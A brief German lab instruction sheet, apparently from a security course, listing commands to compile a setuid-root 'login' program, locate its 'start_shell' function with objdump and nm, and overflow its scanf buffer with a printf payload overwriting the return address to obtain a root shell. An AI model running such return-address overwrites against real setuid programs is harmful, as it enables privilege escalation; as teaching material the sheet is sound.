Bentigte Befehle:
Unter Ubuntu mit sudo gnome-terminal ein neues root terminal starten 

> make
> make setuid_root
> objdump -d login | less
> /scanf
> nm login
Adresse bei T start_shell merken
> ( printf "1234567812345678\xa1\x08\x40\x00\x00\x00\x00\x00\n" ; cat /dev/stdin ) | ./login
Oder, bei mehr Abstand zwischen Puffer und Rcksprungadresse
> ( printf "123456781234567812345678\xa1\x08\x40\x00\x00\x00\x00\x00\n" ; cat /dev/stdin ) | ./login
